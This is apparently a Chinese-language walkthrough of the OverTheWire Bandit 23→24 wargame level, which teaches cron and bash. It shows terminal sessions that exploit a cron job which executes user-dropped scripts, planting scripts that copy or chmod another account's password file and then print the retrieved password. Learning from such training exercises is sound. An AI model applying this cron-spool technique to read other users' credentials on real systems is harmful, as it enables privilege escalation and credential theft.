Wargames与bash知识15

Wargames与bash知识15

Bandit23

基于时间的作业调度程序cron会定期自动运行一个程序。在/etc/cron.d/中查找配置，并查看正在执行的命令。
注意：此级别要求您创建自己的第一个shell脚本。这是一个很大的进步，当你达到这个水平时，你应该为自己感到骄傲！
注2：请记住，shell脚本一旦执行就会被删除，因此您可能需要保留一份副本…
推荐命令：
cron, crontab, crontab(5) (use “man 5 crontab” to access this)

```bash

```bash
bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls -l
total 36
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit15_root
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 Oct  5 06:19 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct  5 06:19 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct  5 06:19 cronjob_bandit24
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit25_root
-rw-r--r-- 1 root root 201 Jan  8  2022 e2scrub_all
-rwx------ 1 root root  52 Oct  5 06:20 otw-tmp-dir
-rw-r--r-- 1 root root 396 Feb  2  2021 sysstat

bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

bandit23@bandit:/etc/cron.d$ cd /usr/bin/
bandit23@bandit:/usr/bin$ ls -l cronjob_bandit*sh
-rwx------ 1 root     root     142 Oct  5 06:19 cronjob_bandit15_root.sh
-rwx------ 1 root     root     443 Oct  5 06:19 cronjob_bandit17_root.sh
-rwxr-x--- 1 bandit22 bandit21 130 Oct  5 06:19 cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Oct  5 06:19 cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 384 Oct  5 06:19 cronjob_bandit24.sh
-rwx------ 1 root     root     497 Oct  5 06:19 cronjob_bandit25_root.sh

bandit23@bandit:/usr/bin$ cat cronjob_bandit24.sh
#!/bin/bash                 #shebang

myname=$(whoami)   

#运行/var/spool/$myname/foo目录下的所有脚本，然后删除
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];  #排除目录.和..
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i          #脚本运行60秒未退出发送信号9（SIGKILL ）
        fi
        rm -f ./$i
    fi
done

脚本的目的是bandit24用户给用户bandit23留了一个“后门”，每分钟运行/var/spool/$myname/foo目录下，文件所有者是bandit23的所有脚本，如果脚本文件文件运行60秒未结束，发送信号9（ SIGKILL）强制结束进程。
根据关卡提示、上面的脚本和以前的经验，我们可以写一个脚本将/etc/bandit_pass/目录下的密码文件bandit24的内容通过重定向保存在/tmp下

bandit23@bandit:~$ cd /var/spool 
bandit23@bandit:/var/spool$ ls
bandit24  cron  mail  rsyslog
bandit23@bandit:/var/spool$ cd /etc/ba
bandit_pass/       bash_completion.d/
bandit23@bandit:/var/spool$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls
bandit0   bandit12  bandit16  bandit2   bandit23  bandit27  bandit30  bandit4  bandit8
bandit1   bandit13  bandit17  bandit20  bandit24  bandit28  bandit31  bandit5  bandit9
bandit10  bandit14  bandit18  bandit21  bandit25  bandit29  bandit32  bandit6
bandit11  bandit15  bandit19  bandit22  bandit26  bandit3   bandit33  bandit7
bandit23@bandit:/etc/bandit_pass$ cd /tmp
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied

建立目录/tmp/bdit24

bandit23@bandit:/tmp$ mkdir bdit24
bandit23@bandit:/tmp$
bandit23@bandit:/tmp$ cd bdit24

使用nano编辑脚本

bandit23@bandit:/tmp/bdit24$ nano bd24
Unable to create directory /home/bandit23/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.

bandit23@bandit:/tmp/bdit24$ ls
bd24

查看完成的脚本

bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
cat /etc/bandit_pass/bandit24 >/tmp/147258369

定时任务脚本cronjob_bandit24.sh使用的是 ./$i的方式运行的脚本，此种运行方法需要脚本有执行权限

bandit23@bandit:/tmp/bdit24$ chmod 755 bd24

bandit23@bandit:/tmp/bdit24$ ls -l
total 4
-rwxr-xr-x 1 bandit23 bandit23 59 Jan 11 15:21 bd24

bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/
cp: cannot create regular file '/var/spool/bandit24/bd24': Operation not permitted
bandit23@bandit:/tmp/bdit24$ cd /var/spool
bandit23@bandit:/var/spool$ ls -l
total 12
dr-xr-x--- 3 bandit24 bandit23 4096 Oct  5 06:19 bandit24
drwxr-xr-x 3 root     root     4096 Sep 19 02:19 cron
lrwxrwxrwx 1 root     root        7 Sep 19 02:19 mail -> ../mail
drwx------ 2 syslog   adm      4096 Dec 30  2021 rsyslog
bandit23@bandit:/var/spool$ cd bandit24
bandit23@bandit:/var/spool/bandit24$ ls
foo
bandit23@bandit:/var/spool/bandit24$ ls -l
total 4
drwxrwx-wx 44 root bandit24 4096 Jan 11 15:22 foo
bandit23@bandit:/var/spool/bandit24$ cd foo
bandit23@bandit:/var/spool/bandit24/foo$ ls
ls: cannot open directory '.': Permission denied

拷贝/tmp/bdit24/bd24到/var/spool/ bandit24/foo

bandit23@bandit:/var/spool/bandit24/foo$ cp /tmp/bdit24/bd24 .

bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/147258369
cat: /tmp/147258369: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ cd /tmp
bandit23@bandit:/tmp$ ls 147*
ls: cannot access '147*': No such file or directory
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied
bandit23@bandit:~$ cat /tmp/147258369
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

定时任务一分钟执行一次。需要等待脚本运行

方法2：

此种方法的重点在于改变密码文件的权限，使bandit23用户有权读取。

bandit23@bandit:/home$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls -l *24
-r-------- 1 bandit24 bandit24 33 Oct  5 06:19 bandit24

bandit23@bandit:/etc/bandit_pass$ cd /tmp/bdit24
bandit23@bandit:/tmp/bdit24$ nano bd24
bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/foo/

bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
mkdir -p /tmp/2424/
cp /etc/bandit_pass/bandit24 /tmp/2424/
chmod 755 /tmp/2424/
chmod 644 /tmp/2424/bandit24

bandit23@bandit:/tmp/bdit24$ cd ../2424
-bash: cd: ../2424: No such file or directory
bandit23@bandit:/tmp/bdit24$ cd /tmp/2424
-bash: cd: /tmp/2424: No such file or directory

bandit23@bandit:~$ cd /tmp/2424
bandit23@bandit:/tmp/2424$ ls
bandit24
bandit23@bandit:/tmp/2424$ cat bandit24
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar